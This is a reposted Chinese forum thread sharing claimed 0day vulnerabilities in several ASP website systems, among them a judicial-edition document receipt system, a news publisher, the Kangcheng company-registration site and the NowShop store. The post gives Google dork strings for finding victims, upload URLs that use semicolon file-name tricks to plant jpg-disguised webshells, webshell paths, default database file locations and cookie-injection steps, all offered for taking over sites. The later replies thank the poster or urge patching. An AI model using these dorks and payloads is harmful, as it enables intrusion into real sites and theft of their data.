大家赶紧的多个0day （下）---转载

tianyueabc

网纪互联公文签收系统司法版通杀上传漏洞

网纪互联公文签收系统司法版通杀上传漏洞 google搜索：inurl:qtdisp.asp?disp_id= 源码根目录漏洞文件in_file.asp 可以自定文件 漏洞文件：in_file.asp 构造语句：in_file.asp?file_name=yueyan.asp; 上我们的图片jpg格式木马 webshell 路径为：upfile/yueyan.asp;.jpg 漏洞分析：同这个0day差不多，原理相同

某新闻发布系统漏洞
无意发现一个站有注入 然后找下关键字发现是某套程序然后找了下关键字
关键字：inurl:  onews.asp?id=
有些是加入了防注入代码 但大部分都没过滤cookies 可以注入中转下。
php的注入漏洞和上传是非常好挖的，只要你在拿站是多留意下建站系统呀，getshell方法呀。。。。
多注意就会发现，有很多漏洞都是通用的。
中国是山寨大国，这些建站系统都是这个抄袭哪个，哪个抄袭这个的，瞬间无语了。,
康城公司注册类网站系统
康城公司注册类网站系统 v9.6
关键字：inurl:company.asp?title=
数据库：Databases/kangchengiop.mdb
或者Databases/kangcheng.mdb
cookies 注入中转
后台拿shell
cookies 名小子 可以上传
ewe 修改样式
数据库备份
插一句 建议不使用！!

NowShop商城系统上传0day

上传页面：admin/upload.asp
上传语句构造：admin/upload.asp?fuptype=db&fupname=yueyan.asp;&frmname=yueyan.asp
本地上传：yueyan.jpg
具体就不说明了。。。

hntc007

学习中，还不知道怎么用。。

蓝颜

支持 了、   

热心网友7

楼主分享的这些漏洞信息挺全面的，看得出你对建站系统的漏洞挖掘很有研究。不过这些0day现在公开出来，可能会被恶意利用，建议看到帖子的站长发到官方或安全团队那边，及时修复加固。另外，当年很多系统确实存在通用缺陷，现在应该大部分都更新了吧。

热心网友6

谢谢楼主分享，这几个漏洞信息很有价值。特别是网纪互联公文签收系统和NowShop商城的上传漏洞，看描述利用方式挺直接，得赶紧检查一下自己或者客户手里有没有用这些系统的。另外康城系统的数据库路径也直接给了，建议用过的朋友尽快修改默认路径或做安全加固。再次感谢提醒！

热心网友1

感谢分享这些漏洞信息，看起来都是比较老的系统了。大家如果还在用这些系统的话，建议尽快升级到最新版本或更换更安全的替代方案，同时注意修改默认数据库路径、过滤上传文件、做好防注入等措施。安全无小事，常更新常检查才稳妥。